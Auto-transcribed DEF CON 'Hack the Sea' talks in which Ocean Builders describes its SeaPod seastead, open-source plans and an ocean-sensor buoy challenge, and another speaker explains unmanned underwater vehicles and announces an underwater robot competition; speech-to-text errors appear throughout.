sea-stead, but now they are hunted as criminals I was just going to FaceTime him and be able to see my brother and now I can't, you know, I can't see where he is, I can't talk to him, you know, it's just killing me, I'm sorry It's hard And we're also trying to communicate with Chad ourselves, we'll let you know if he's able to reply Kimberly Craig, 7 Action News She's a sex-fertnadia, she's Thai, so she's her family, her son, was supposed to start school this week We're trying to sign him up, we had to go in this week and go take care of that but she can't, all this is all messed up, it doubles our resolve, the sea-steading has to happen We're obviously still, I mean this week was a whole hit on freedom We needed a show that we can look up to, we were free on the sea-stead, we could have just for a moment, and it was great When I die, it's my funeral, I'd like them to show that I live the life So far we're safe, we're here for our lives, 99 year, very worried, it's been hard for both of us So far we're still alive, that's all we're trying to do is stay alive Okay, hello everyone, well, so hopefully that gives you a good overview of what we are doing, what we're about, and just kind of the plan A to B from a very high level But excited to be here today to be able to speak with you all and share with you our vision of what we're trying to do Like I said at the beginning, we see this as the new frontier, like this is almost an undiscovered country because people have never really been able to build a home that can float on the water That can be in international waters on the ocean, and so we kind of cracked the code a little bit with this And what I'm really excited about is just in the last week, like I shared just before, we are now announcing that we are open sourcing all the technology, all the software, all the hardware, everything we're going to be developing for making this happen is going to be open source And it's on our GitHub right now, hope you guys can hear me right now And if you have any questions posted in either the general text area or the C-studding text area, and I'll try to answer your questions or whatever you have while we're on live here And I'm going to share my screen, and let's see right here Okay, hopefully you can see my screen. So like I showed earlier, this is the original prototype. It wasn't anything special to look at, but when we were sailing towards it for the first time and we saw it there, first it was off in the distance, there's this little white dot, and it was just getting bigger and bigger and bigger and it was just, it was an amazing thing to be there because it felt like this represented something Like a whole new thing that's starting from scratch, like the whole new frontier was starting from this just one little dot, and it was really exciting to get to approach it and see it getting bigger and bigger, and then to actually be there and then to actually step foot on the C-stud, that was pretty amazing I was involved in a project called Freedom Ship about 20 years ago, which was a project to build a floating ship that would travel all over the world every two years and stop at different ports of call as it went along, so it stopped around different cities and different countries around the world So I thought that was just the most amazing thing because it felt like, wow, this was really an amazing, you get to live at home on your, you know, one of the 20,000 condos that would be on this floating ship, but you could also see the world, which I thought was a really fantastic idea The problem with that is it was going to cost like $7 billion to start, so it just couldn't get off the ground because that's so much momentum that you need to do to get to that point that it's just really hard to do that, I mean, about $7 billion hanging around to start that kind of a project So what I loved about this when I saw this was that this only cost $150,000 to build the first prototype, that's just building one, so the idea was if we built like 20, the cost would go down, go down and be even more affordable for people And so when I first got involved, the units looked like this and that was not very attractive and it's not something that really inspires people to want to live there, so we felt it was really important to, well, I felt it was really important to make it something that when you looked at it, you said, wow, that's beautiful, that's amazing And so that kind of inspires you to want to visit, to be able to experience it, to see it for yourself, your own eyes, or to just walk on it and see what it's like and check it out, and just inspire some curiosity So that was kind of started a whole year and a half of major redesign that we've been doing, so now the houses kind of look like something, it's the same kind of general structure, but now it's like something that jetsons rather than something out of, I don't know, something much more prehistoric And so I think we have a beautiful design now, and so we are in Panama, like I shared, this is one of our renderings for the new design, I think it's beautiful, some people love it, some people don't, but I think most people are, think it's pretty darn interesting and looks a lot better than our project I think it's, I really wanted to capture the idea that this is a futuristic thing, that this can be a futuristic and technological achievement, because the technology that goes into making this is very, very simple, but it just hasn't been done before And I've had this technology to make this happen for the structure for a very long time, it's the same structural backbone as making the oil rig, where you have this big pole that goes into the ground, or not into the ground, sorry, into the water, it's kind of like when you have a wine bottle and you throw it in the water and it'll just float And then it stays, it stays afloat, because it'll just stay there forever, but it kind of bops around and it's very, not very stable, so what we do to make this very stable is we put a very heavy weight underneath, like very far below the water And that's about 100 tons of weight, like 100 tons, that's a lot of weight, wouldn't want to have that fall in your foot, but so it's very heavy, and so that makes it very stable and then we tie it down with three mooring lines, so it's locked in place, it's very averse to bad weather Because normally when you're in the water, waves come along and your boat is moved around a lot by the waves, but in our case, you can see from the designs here that the house is about two and a half meters off the water, so the waves pass it There's only a little bit of interaction between the waves and the poles, because it's just a fairly thin area, and the waves just kind of go around So we're excited about it, and we're building in Panama, like I said, we're open sourcing, which is something we're announcing, we're officially here, we've started getting all our code on the GitHub account, so you can go there right now and we have software for mobile apps that will be able to control your smart home, your floating smart home So it's actually our code is written in Flutter, so it's can be used for both iOS, Android, as well as for web apps, so it's really nice little platform, so it goes all three ways And so right now we have the beta there, it's not released, it's released into the Android store, but not yet into the Apple store, so you can go there on the Android store, you have an Android and check it out, I think you can just search for ocean builders, but on our GitHub there's, we created several different repos for different projects that we're really excited about, and I'll show you some of the projects we're really excited about, and for anyone that signs up to do any of our challenges, we're going to give you some exclusive first look details on some of the things we're excited we're working on There's some things breaking right now that I can't talk about yet, but should be able to in about two weeks, so anyone that signs up for our challenge, we will, you'll get first access to some of those details, and it's, I'm just, my mind is blown by all the stuff that's going on right now We're making like more progress in the last two weeks than most of the sea-steadying history has made in the last 10 years, it's really, really exciting to see, it's really moving fast, so it's like trying to keep up with it So part of the reason I wanted to do this conference was to reach out to people like you guys that are passionate about building really cool things, hacking the future, hacking technology, and finding ways to make technology work better for us, and that can be any different kinds, that can be in so many different kinds of ways That can be from writing software, hardware, figuring out new hardware, and building different devices that have never really existed before because there hasn't been so much of a need, like we've never had a floating city before, so this will create a whole new wave of entrepreneurs that can create all new kinds of technologies I think a lot of the technologies that will be invented, that will have to be invented to live on this kind of floating future, would be pretty breakthrough and pretty amazing, although there's some text over there, I don't know if you guys have any questions Waterworld, so some people say yes, is this like Waterworld, and I kind of reply to that, this is more like the Jetsons on the water, so it's pretty different from that So probably stupid question, why have Log smaller than the part where people don't purpose the Log serves? I'm not sure what you're talking about I'm just going to take some live questions here while you guys are asking them, I was wondering a bit about the relationship with the local communities and areas you're building in, for example outreach and support So that's something we're really trying to emphasize a lot this year, now because we've learned what not to do in the past and we're trying to improve and make things better, so we're actually in Panama like I said, and when this whole pandemic started, we have some very large scale 3 printers, one is 20 feet long by 16 feet wide and 8 feet tall, made by Rectorbot, rectorbot.com And then we have another one that's one meter by one meter by one meter, so they're huge, so we wanted to see if there's something we could do with printing emergency medical supplies, so we're actually working with the government of Panama to help 3D print emergency medical supplies We were on it right away at the beginning of the pandemic, the government took a little bit of time to set up all the regulatory procedures for how things would need to be certified for health use and all that, so that took them a little bit of time, but they're, I think they're almost ready to go So if there is a second wave, we're all set up, all the health stuff is all ready to go, so we're ready to start going into production with making emergency medical supplies, or parts for hospitals, for machines in hospitals, or any where else that they might need supplies, so we'll be able to help out there We're creating a lot of jobs, we're creating high tech jobs as well, and we're bringing foreign investment in the country, so we're doing a lot, we also several times, every couple weekends we do deliver food to communities that have been impacted by coronavirus, so we're definitely doing as much outreach as we can So 100 tons is feasible to move, there's a couple different versions we're working on, there's the deep water sparer model that goes about 35 meters deep total, and that has a 110 weight at the bottom, so that's not very easy to move at all The other one is a shallow water model, and that is only about 5 meters deep, and that's much easier to move They can all be moved, but they're not really made to be moved, now we are considering designs that would allow you to fully move your house, but that's an experimental thing, we're actively building tests and prototypes right now to test that So it's kind of cool, I actually had to have a picture of those, one of the prototypes, this is actually one of the prototypes of the movable version, this would be the hull that goes under the water, just kind of an interesting design Oh here it is actually, so you can't really see too much, but this is a small 1-8th scale size of just a transport vessel using the same technology, so instead of having a normal shaped boat, this actually is called a swath, so it has two hulls that go under the water, so this is one hull here And the other one is on the other side, kind of out of focus here, then you have these arms that go down, and the water line would be about here, and here, and then the base, the house, or the vessel, the boat, where passengers would sit, would be on top So it kind of rides above, it's the same kind of idea, it rides above the waves, and the reason we make this is that we found when we had the first C-STED it was hard to get from point A to point B when there's big waves, and it was hard to be able to go to your house and pick people up or whatever So we designed this kind of craft to be able to break through very high waves and still get places where there's not so good. Let's see, I'll get some more questions. Is it possible without including the ocean? Yes. Our first C-STED in Thailand was 13 miles from shore, and what's interesting was, when you're that far away from shore, there's no life in the water, people think that the ocean is filled with life, but there's really not a lot of life There is, it's just water mostly, because there's no place for life to congregate around, so we put our spar into the water, and two months later there's thousands and thousands of fish around, there's a lot, it was hard to, like you couldn't look anywhere and not see thousands of fish We have video of that, it was pretty astounding. So can you do it without polluting? We're actually creating an environment for fish, so we actually are building our homes in a way that is eco-restorative. We have some ways of composting our toilet water, so it actually becomes compost. There's some methods of using electro-coagulation for treating gray water, instead of using other processes, electro-coagulation is a fantastic technology that's not really used very much, and we have a version of it that I think is an improvement of what else is being used. So let's see, jump through some other questions here. Okay, thanks Pierre Snickles for the SWATH link there. Okay, so we have some projects, I'd like to just go over them, we're actually going through time here pretty quickly, so I'll give you a bit of an overview. This is our manufacturing plant we started building just before, this was like early February. We just started putting the concrete in for the bases for the poles for the frame for the manufacturing plant. Now this was about two weeks ago, this picture, so now the plant is up, which is, hey, we got some work done even during a global lockdown. We did little pieces here and there, but there was a lot slower obviously, so we're about three months behind, but we're forging ahead as fast as we can. This is a pretty huge building. It will house two C pods without the pole, of course, inside at a time, so we can produce two at a time at this location. There's a view of the inside. This is our roller machine, so our ground spars that go into the water that you saw in the pictures, those will be rolled on this machine. You put these big slabs of flat steel and it goes through and rolls it and then bends it a little bit and then you go through again and bends it, bends it, bends it and keep on putting it through until you get the right curvature on the steel. I haven't seen it in person myself because I'm in Canada right now because I left before the lockdown so I can get some things done up here. We have a full team down in Panama working as well. This is our main engineer, Rudiger Koch, who is a German aerospace engineer. He started Seasteading because he wanted to go to space and he decided that he needed Seasteads to be able to have as a platform to observe the places where he would be launching his vehicles into space or things that he'd be sending up into space. So he's definitely a pioneer. So this is a view of him looking through one of the molds that goes to the central spar inside the house. There's more images. Let's see. This is our development site where we're actually going to be putting the homes into the water. We set up a technology incubator. So we can kind of play the, I don't know if this video will play. Then, yeah, so we set up a technology incubator where we have people from all over the world coming down to help us figure out really cool technologies. We have all kinds of really fantastic technologies that I'm really super excited about. I'll talk about those soon. This is a video of me swimming around the underwater spar of the original prototype in Thailand. And there's just thousands of fish there, even more and more and more as the video goes on. So I can't jump ahead on the way it's lined up. It's pretty cool. This is us in Panama. We're launching another prototype. This is a one third scale, but one third scale is actually very large still. So we're towing it out to the site. And here we're standing on it. And so this is the spar. So the full scale size would be three times water, three times taller, three times longer. This is just the pole and then the base to test some engineering principles. So I'm going to jump to talk about some of the projects we are really passionate about. One is the Aquaboy, we're calling it. Names may change, but we'll post the exact details of this, I guess, with, we'll coordinate with DEF CON about all the details of this. But this is the basic idea. The vision of what it might look like and all the specifications may change and be modified and refined. But the idea is that we have this like a water buoy that would just collect data. And data for us is really important because if there's a big storm brewing a couple of miles away, we might want to know. You might want to get back to our Seastead and just prepare for rough weather, weather, or do whatever we need to do. Or if we're out fishing nearby and you might want to go home and tie up the boats or something like that. So we'd like to have like a remote beacon that can check weather, check wave heights, see if there's some big huge rogue wave coming our way. We'll be able to monitor weather in different locations so it can check wave heights. So movement from this flat average sea level and then if the sensor goes up two, three feet, then goes down two, three feet below the horizon. And we know the wave height is like four feet. And we'll know the time between the maximum heights, between the height, and then when it goes to the lowest point, to the highest point. So we'll be able to measure the time in between the period, the wave period, the wave length as well, as we know the time in between. So we can get some really valuable data under so we can collect data underneath the water as well as above the water. We can collect turbidity levels, oxygen levels, pH levels, all kinds of really cool things we can collect. We can even have cameras under there and collect data on nearby ecosystems and see what the coral is like there and just monitor over time. We can have instruments on the top to measure air temperature and whatever other factors, humidity or whatever. And then what's really exciting about this is also we may look at going into new areas we've never been into before and we might put these these boys areas that we've never been that we want to look at maybe for living there or putting a whole community there in five years or in two years. But we can put a buoy there and collect data for a year and just see what the average conditions are throughout a year or two of collecting data. Like is that a good place to be or the waves usually good there but then there's some crazy waves that really makes it like a nice place to live. And you can get some really good valuable data from that for ourselves for where we might want to use to do seed study. But maybe there's also useful data we can collect for environmental purposes, environmental monitoring, share it with organizations that track the effect of different water temperatures on coral and we have cameras and see what the effect is of different water temperatures and different water conditions on coral in the area. So we can do some really cool things I think all the state and we had like 10 of these all over Panama where we're located and we can maybe crunch it with AI and get some really, really cool useful information. The aqua boy would be geostationary so we'd ideally like to hold it in place and we'd have a partner engineers to grow up with the best way of doing that is. Yes, so we will. We have a sign up page pinned on our on the sea setting chat on our channel here so sign up there we have tons of projects that we're very excited about. We'll have the, we're going to pick a winner for all these different projects we're going to, I guess we'll pick that next year at DEF CON in Vegas, maybe put some of these in the water and see who, who's performs the best. And then we'll have some real cool prizes will feature you as a contributor as a winning. Just been we have tons of media that's always trying to cover us because we're doing some pretty interesting things sometimes we want to highlight our partners and people that we're collaborating with. So I think there's some really cool fun opportunities will be some cash prizes, and we will be picking someone that wins from participating similar projects to fly them down to Panama and give them a couple days on a sea stand so you can experience it for yourself. So I think it's some really fun and cool stuff we have. We're building the future and the future is floating and it's really exciting so see if there's any more here. How do you power? How do you diagnose the ground is that sea house? Okay, so, so how do we, how are we powered? We will be the default system of power will be solar. So we have to be pretty conservative with power. We will have course batteries and we're looking at using a propane backup. So if we, the batteries run really low, then we can switch on propane backup, propane power backup and then hopefully the not to distance future will be able to make methane from sea from seaweed. And then we'll use that in our generators to has a backup power source. We're also looking at some potential power generation from the water itself so using Otec. It's a little bit tricky to use, but you may have a way of solving that on a small scale version of Otec, which is ocean thermal electrical conversion. And wave generators and some other things that we're looking at. We have some people that we're partnering with that have some wave energy wave generators that they're developing in St. Lucia. So we may partner with them to bring that to Panama as well. Some of the other projects I'll mention quickly is an see Aqua cycle. No, not that one. So many projects, both in communication with ML. So I guess the one we're that Nina was talking about yesterday would be a swimmer. So we would be doing the aqua boy. Yeah, the Aqua scanner is really, really cool technology. The idea is the idea that was suggested originally and this can change would be to have a really inexpensive add on that you can add to any normal drone. That would be like an array of cameras that you could dip in a grid over the water. So you can have like a grid like this, each of these red dots would be a point where the drone, the array of cameras would go into the water. And then that that takes pictures with three cameras under the water at an angle. So you get three pictures at one at this way, 120 degrees offset from that another 120 degrees off that and that. So you actually get, you can put all these pictures together and get like a 3D image, we'll call it photo. Potometry, I think it's called, and you stitch all these images together and you actually get 3D recreate you can recreate a full 3D recreation of the surface of the underwater landscape, which is breathtakingly beautiful. And I think it's really important for research to be able to do something like this because you can see what is going on with the with the ocean live as it's happening. And you can do it year after year and year after year and compare to see what's going on with the ocean, what's going on with the coral. And you can see if there's improvement in any areas and if there's a reduction in the or depletion in any areas. We can also put different sensors on these on the scanner so we can detect other things like pH or other things we want to measure and then we'll have, we have this incredible database of highly precise data that's mapped very, very quickly and very inexpensively because this really shouldn't cost very much. So we have all these things pinned on our on our sea setting page on our sea setting channel. So please check that out underwater drones would be great. Yeah, there's we'd love to have some underwater drones. I'd love to coordinate I think with Dave was supposed to be on the talk yesterday with Nina talking about how do you do underwater IOT I'd love to be in on that as well. And let's see if there's anything else I have just a few minutes left so I want to make sure I cover as much as I can. So basically, we wanted to come here because we wanted to really reach out to people to help because I think this is like the most exciting thing that's going on in the planet right now maybe I'm a little bit biased. There's, there's so many technologies that can come from this because we need to develop technology to be able to live successfully on the water. So we're kind of doing a call to action here and we want this to happen we're excited about this happening. And we're opening we're so excited about it we're opening all the technology up to be open source. So anyone any personal individuals or corporations or anyone else can come in afterwards or come in anytime they want and download our code download even all of our designs for like our CAD drawings for all our homes and everything we're building is growing up on our GitHub we're probably going to move it somewhere else eventually but for now because I get helps not the ideal place for CAD drawings but we're starting there. We just threw it all up in a hurry this week so it's all there now you can all download it for archival purposes if you like. So yeah we're really want to call it community and see who can contribute who's excited about this who would like to contribute in some different ways, help us with hacking 3d printers like large scale 3d printers to be able to print we would like to be able to within a year we would like to be able to 3d print an entire floating home in like a long weekend. We think it's possible get some ideas and how to do it but we need some help figuring it out because we have the hardware but we don't have the software and things to make it up and figure out what all the materials are going to be. We have some really cool IOT we love some really cool IOT projects home automation projects, hydroponics we have some really kickass hydroponics things we're doing 3d printed coral gardens, aquatic transport drones. So yeah there's a lot of things here that are really exciting. So hope you guys got to answer most of your questions. So I'll be around on and off for the next couple hours and then I'm going to have dinner and I'll be back around so I'll be available to answer questions. Try to put them on the C-Steady chat channel so I make sure I see them right away and it's easy for me to find them and I can get in touch with us. My email is grant at oceanbuilders.com it's grant at oceanbuilders.com. So yeah please go and sign up for our challenges. Tell us what you're interested in participating in we'll send out more information on the challenge that we're going to be doing and I suppose we'll be coordinated with hack the sea organizers as well to get all that information out and see you there. So I guess that's the end.
|
Hacking the SeaPod
|
10.5446/51636 (DOI)
|
Hey, Safe Mode, welcome to Hack the Sea. I'm Kitty and I'm here to give you a brief explainer on what UUVs are and what your challenges are. So essentially, a UUV is an unmanned underwater vehicle, or as I like to say, an unpersoned or uncrewed underwater vehicle. Underneath the category of a UUV, there are two central subtypes. There's the AUV, the autonomous underwater vehicle, and the ROV, the remotely operated vehicle. And the key difference between these two is one is a self-guided, self-contained system, the AUV, and it makes its own decisions and completes its own tasks without human guidance or interference. The ROV, conversely, is usually a tethered system, but either way, it's connected to a human who's helping the machine complete its tasks and go along its guidance. Essentially, what we're talking about here are maritime robots. So why do we need maritime robots? Well, most of it is about exploring or extracting stuff from the ocean. And what we know about humans and the ocean is that if you put a human under the water on a long enough timeline, they tend to die. So the history of the development of technologies for exploration and extraction used to be about putting a suit around a human or putting a crew inside some sort of undersea shelter that would allow them to do the things they wanted to do. And that timeline is quite long. So what you're looking at in this image is an atmospheric diving suit, and that I think is an image from 2014. But more interestingly, the submarine you're looking at, what essentially looks like a barrel with a window on it, that model is from the 1700s. So the history of trying to extract and explore the ocean is quite long. The other thing that we tend to do under the ocean, largely brought on by a number of wars, is we do tend to do fighting underneath the sea. And what you're looking at here is an example of an unmanned torpedo. So the way this works is this person sits atop this torpedo, and in front of this person is a timed warhead. And what they do is they guide the torpedo to its location. The driver then drives the manned torpedo over near the enemy ship, attaches the warhead, and then drops and runs as or swims as fast as they can to get away. So presumably people signing up for this job probably drew the short straw. But this is much of what drives the development, at least for militaries, for the creation of a UUV, because this is a high-risk environment. So what we're asking to do at Hack the Sea is for you guys to start thinking about ways to create some battle bots. And so I have three essential, easier and harder design sets that you want to start thinking about if you want to play next year at Def Count 29. So the easier way to think about this is to tether. And so if you wanted to engage in your battle and you wanted to tether your bot, you certainly have a lot of access to power, you certainly have a lot of access to data, and your maneuver capability is higher. But this is the easy model. And in all honesty, I would be surprised if we allowed people to operate tethered in this way. The harder challenge and the one I think we want to see you guys do is the untethered remotely operated robot. But we will come out with guidance on that challenge pretty soon. But the problem with that untethered remotely operated robot is that under the water, radio frequency doesn't work. And so you're pretty much left with sound and maybe light. And so good luck on that and we look forward to seeing what you come up with. Another challenge that you want to think about is where on the water do you want to be? And we will have separate challenges for that. But essentially there are three general positions. There's your floaters, there's your swimmers, and there's your bottom crawlers. So your floaters will obviously have more access to light and potentially communication. Your bottom crawlers will be in their most austere position, but they will at least be able to locate where they are in the water because they can touch the bottom. And interestingly and quite challengingly there are your free swimmers and who even knows how you're going to figure out how to orient yourself in that condition. The other thing that you need to start thinking about is how to power it. So the way the military powers things, in particular submarines, is either nuclear power or diesel electric. These are probably not two categories you'll be allowed to use. So I look forward to seeing what you guys come up with. That is about it for my explainer on UUVs. I didn't want to take it on too long, but I do want to say that I know that you see me wearing a bow tie, and that bow tie is really because I want to dedicate this talk to a friend, a colleague, and a mentor, Will Bundy, who passed away this last December. He was a huge part of the Naval War Colleges, moved toward innovation, and he was a big proponent of thinking about all sorts of unmanned autonomous systems. And so I just wanted to say thanks and we miss you. And now that that's done, I figured I would have a little fun at the back end of this video. So I tried to think about how to work in some sort of reference and a tie between cocktail and this video, and I couldn't, so we're just going to make a cocktail. So what you're going to need, I'll move my camera in order to make a Manhattan in the style that I make a Manhattan, is you're going to need some bourbon, and you're going to need some vermouth, you're going to need some bitters, some cherries, some ice, and a way to stir it. Let's give it a shot. So I tend to make a pretty stiff Manhattan, so I just want to warn you advance the three foam proportions to be prepared for a stiff drink. So you're going to start with your bourbon. I have here something I bought from a local distillery, filibuster. It's a really nice standard bourbon. They call it a whiskey because they age it in a different way. So you're going to take two and a half parts of bourbon. You're going to grab some vermouth, a sweet vermouth. I can use this thing called carpano antica, which is considered an amaro, but that's fancy words. Just get a sweet vermouth. You'll learn over time what your favorites are, and I do one part of that. And now I'm going to put my bitters in. So I go with two different kinds of bitters. I go with angostura bitters, and then a little bit of what's called tiki bitters, but really you should play around as much as you want with the bitters. So you find out whether you like that deep, crispy flavor or something more peppery that's entirely up to you. Put a little bit of this in here. Healthy dash of angostura bitters. And the thing that I find that's most interesting and important and also controversial is I believe strongly in allowing the flavor of the cherry to come into the Manhattan. And so often what I'll do when I buy my cherries is when I put the cherry in the drink. There, see this is a tethered cherry. And I put just a little bit of the cherry juice into the Manhattan to give it just a little bit more cherry flavor. In the real world you should be stirring this for somewhere 20 or 30 seconds to get that temperature way down there and to mix all the sugars together. And I have forgotten my skimmer, so I'll just put my finger down here. That's how you make a Manhattan. I will say for anybody who makes it all the way to the end of this video hit me up at Defcon 29 and I will definitely help you make your own Manhattan. I look forward to seeing you guys. I look forward to seeing the battle box. Take care. Thanks guys. Turn this one off. Alright, let me turn my cameras on. Hey guys, I wanted to say thank you. I don't know why my camera's off. I'm sorry, my screen. Who knows anyway. In all seriousness, the challenge that we're dreaming up for Hack the C. It we're hoping to play out in in 2021. The challenge we're really looking for is going to be a hard to try and do this the hard way right so there are going to be two categories or classes and I want to talk a little bit about the swimmers and then I'm going to kick it over to Grant and Grant is going to talk a little bit about the floaters. So, and in while I'm doing this, this this part of the preso, feel free to text in some some questions and answers. And then after Grant talks a little bit about his challenge on floaters, I want to kick it over in a very weird way. You're going to listen to him on my phone because we can't get his audio enabled. You're going to listen to Dave talk about undersea IOT, which is a growing commonality in the water. So, so okay, so here's the deal. Next summer, we would like to see you folks bring some bots to battle in the water. The swimmer class is going to hopefully operate untethered. Now, what does that mean? That means that all of that. All those advantages you have normally by attaching a tether to your bot so that it can go through an obstacle course aren't going to be there. In particular, one of your greatest challenges is going to be power and the other one is going to be comms with your bot to get to go through a system. You have all the opportunities you want if you want to make it an AUV if you want to make it autonomous that's great but you got to be careful right because it's an obstacle course. So here are the general rules and then as we go forward, we will be sending out specifics and guidelines, but in general, we're hoping that your bot will not be any bigger than checked luggage. Ideally, it will be about the size of carry on luggage. Why did we do that? We did that because we need you to get your bot to Vegas and in order to get your bot to Vegas, it's got to fit in some luggage. Otherwise, you'll have a hell of a time getting it here. So, checked luggage or carry on luggage and we'll be more specific about dimensions going on going forward. I can automatically tell that some of you are going to want to know can it fit in checked luggage and then I can unfold it. Probably, but we'll figure it out. Ideally, your bot is going to be untethered for power. We can talk later about whether or not you can do a glider motion, which is your bot can be underwater and then come up for comms and then go back down again. That's a valid design. We'll think about it. And again, we'll have clear guidelines here going forward. We're thinking no more than $1,000 expenditures. So for those of you who are in makerspaces, if you want to put a team together and start thinking about how to build this, we really don't want you to be buying the Gucci set. Like, cobble this together, make it work, but do it the hard way. And we're looking forward to seeing what you come up with. Like I said, reach out to me or reach out to hack the sea. We're at hack the sea.org and we will have in the coming weeks, the exact specifications and the gateways and challenges to get us moving forward. And if you have any other questions, I'm here, but at this point, I'm going to kick it over to Grant, hopefully, and Grant. Grant will talk about the floater class. Hello. How are you? All right. Very excited to be here. My name is Grant from Ocean Builders. We are sea stedders. We are the ones that are famous for building a floating home in the water in Thailand. Let me see if I can share my screen here. Maybe that's not working. Okay, maybe I can't share my screen. Can you hear me okay? Okay. Now something went wrong. Okay, there it is. Okay, so maybe I can't share my screen. I was going to show you some images of the original sea sted that we built in Thailand that was very famously attacked by the Thai Navy and ended up turning into a 10-day manhunt by the Thai Navy. There's a very interesting story right now. A book is being written about it as well as a screenplay for a movie, so I'll talk more about that in my official talk tomorrow. But I wanted to talk here about the challenge we're going to be doing for a floater. And for sea steding, something that's really important for us is to be able to have advanced warning if there's big waves or see what's actually going on in the area around us. So we would like to have some notice that there's big storms coming up and things like that. And also another purpose is to be able to observe the marine ecosystem around us. So we want to build what we call an aqua boy, like a man, but the actual boys that float in the water and fill it with as many sensors that can give us very useful information as possible. So useful information can be water temperature, pH levels, salinity, turbidity, maybe even cameras connected and collect some data or maybe even have machine learning. So we'll be putting together the specifications on exactly what all the details are. We already have a bit of a cheat sheet pinned on our channel, so you can go and download what we have already. It's already there. And we'll just give you some information on the ideas that we have for what that is and we'll revise that as we go along here. But we're pretty close to what we want for the specifications of what would be there. Ideally, we would have a maximum price and size, of course. It should be something you should be able to bring to Vegas, like Nina was saying, you should be able to transport it there. Otherwise, it doesn't make sense. And it could look like something like a normal buoy that you see floating in the water that is kind of used for the red and green boys that you see for direction for boats to navigate through some waterways. It could be very similar to those in kind of shape and it can take under the water, there would be a sensor array above the water. There can be sensors in them as well. So it's really unfortunate. I can't share my screen, but I'll maybe have that solved for the next talk tomorrow. And so I can go through a few of the details here that we had. There's also a link to join the challenge. So if anyone here wants to look at the challenge or look at some of the challenges we have that we're going to be doing over the next year. There's a link to a little survey sign up form where you can actually put your name and information and kind of check off what your interests are. And I think we have something very unique because we are like this is hack the sea. Everyone's here to find out how to hack the sea. And this is, I think, a really interesting opportunity. We're at the time where all these technologies now exist for us to be able to do some really fantastic things on the ocean. And so we're out there doing it. We're C-STETers. We're actually building hardware. We're actually making things happen. And people have been talking about building a city on the sea for decades, but no one's actually done it. So we're actually the first ones that are actually putting hardware together and putting it in the water. So we're really excited about being able to reach people and reach out to a community of hackers that likes building things and is passionate about building things and can help us to move everything forward. We're really looking for kind of here. We're here mostly to do a call of action to say, okay, here's the opportunities. The sea is wide open with all these incredible opportunities of what we can do. And I think now is a really amazing time to actually bring all these things together, do a call of action here to anyone that wants to participate and help us do some really interesting things. So we'll give a longer talk tomorrow. I'll have some videos and presentations around the whole thing. But I think we can probably pass it along to back to Nina, who's going to patch through with Dave on the phone. Thanks a lot, Grant. Yep. So we got Dave on the phone. I do want to say just as an addition to Grant's commentary here, we aren't looking to have people bring their proprietary. Source stuff right to the to the battle. These we're looking for open source hardware and software on this one right want to be able to share. That's the way that works. And so look for that to be a requirement in in in the in the battle guidelines. And so alright, so this is awkward as hell, but I'm going to have Dave speak to you about the underwater IOT via my phone. So I'm just going to I'm going to look to Grant to give me the thumbs up to see if he can hear Dave Dave take it away. Okay, can you hear me? I get too much feedback here. So I'm kind of flying blind here. I'll do the best that I can. So I'm kind of flipping through my PowerPoint here. I didn't actually hear Nina's video so I don't really know what she covered in terms of UVBs. But you know just to sort of put things in context, I guess. You know, these basically unmanned undersea vehicles and you know, Dave, I'm going to catch up. Stand by one. I'm going to catch up. We're getting way too much echo. Here's what I'm going to do. I think what we're going to do is we will tip pocket to the whole world now. We're going to we may try and ask you to dial in tomorrow and see if we can get you human plus status. So for the for the universe out there. Unfortunately, Dave does not have human plus status and so the video and audio functions aren't working. And so we'll have him prezzo out probably following Grant tomorrow but we'll see if we can spin up in the meantime I'm going to take some questions. I'll just gain it and I'll see if I can grab Dave's slides but but just yeah and then and then just as a takeaway the the the undersea IOT stuff is actually really getting built out pretty aggressively Dave what's the timeline you figure. Within the next 10 years he's next five or 10 years. That's the critical path. As things progress with communications in the undersea. That's the critical path. Okay, Dave we're going to we're going to have you we're going to have you. We're going to get you added to tomorrow's jam so I'll do that in the back and let me just take you in a now so we'll talk to you in a couple minutes Dave thanks so much for we'll get there. Thanks for coming in. Alright great if you want to, if you want to unmute, then we'll just take whatever questions come up, or we can just riff until then. Well I'm really excited to hear about the underwater IOT from Dave. I wanted to hear it. So let's why don't you and I talk about why don't you and I talk about like why does it what's what's so hard about you UVs like what why does that. We have plenty of flying drones like what's the what's the special challenge about about being under the water, and you can talk about this in the sea setting perspective, and I can talk about from the naval perspective but I'll kick it off to you first. Well it's communication getting the data from whatever is when you're underwater you can't send a radio signal above you know it doesn't doesn't travel so that's the that's the core problem so if we. You know, if we can solve that, or if there's a solution or some way of communicating that would be that would be incredible that could be a game changer. So I mean I think this is I mean this this can't be stressed strongly enough when I've been talking to roboticists who do undersea stuff. One of the core challenges and why they're people are talking about going autonomous with their robots is this problem of communication so for those folks who don't play around in the water stuff radio frequency, the way in which comes work wireless comms. You know the way in which our drones fly. That is not a thing you get to do under the water, you're left with two sources of signals under the water, unless you count Dave's undersea IOT, but you're really looking at light and so on our grant do you know any other ways besides light and so on our sound and light. No. Yeah, I'm not either so I'm curious to see what Dave has to see about an undersea IOT. But, but really so now you're talking about a bot that is either working on delayed comms, or if you're going to do light you got to worry about some other problems and so there also additional issues which is the bathymetry of the water so how deep is it you get different pressure the farther you go down you get different resistance on the on the hull itself. Great. Are you familiar at all what happens when you put lithium ion battery encased in a small shell and put it underwater. No, I haven't. I haven't really researched much on and if the battery off gases what do you have then you have a you have a pipe. So, the other problem we're going to deal with in that in that UV category is power. And so I this is a very serious issue that even if you get a really good lithium ion battery in that in that bot and it's operating autonomously underwater. Now you have to worry about whether or not it that the encasement the shell it's right is secure enough so to so as to prevent a serious problem with that. The other way you could do it is you could try and create some floater that follows along but again this is really up to the hackers to figure out but but we're really going to try and push you guys on the edges of how much power can you pack into one of those things and make it operate on tethered and how are you going to get to communicate. And by the way, if you get really smart ways to communicate. I'm just assuming other people are going to be messing with you to I could be wrong about that. But I'm guessing they're gonna. So, because of the under so the undersea problem is a real one. The other problem that we're talking about for swimmers is orientation. So for bottom crawling bots, they've got the ground they can orient right so now they're left with four directions forward back left and right. So similarly for floaters, you're going to be on the water surface forward back left and right. But if you're a swimmer, you have two more dimensions to worry about and that's up down. So if you're thinking about trying to orient yourself in the water not only do you have to figure out where you are with no real touch points, but you've got six directions to worry about so. Again, I don't know how our hackers are going to deal with it. I don't know what they're going to do to solve their problem that I'm crossing my fingers for him. Great. Do you want to talk about the floater class. Yes, so actually now that you're mentioning it. I talked with Brian, I talked with Brian about a number of different possible ideas and challenges. And we talked about having a stationary boy that collects data sensor data. And then we also talked about having a like a robo boat, basically a robot boat that moves around. And so for the, for the floater, are we talking about the moving version or the stationary. I, whichever one you're thinking about, I mean, this is for you guys to build out. Good 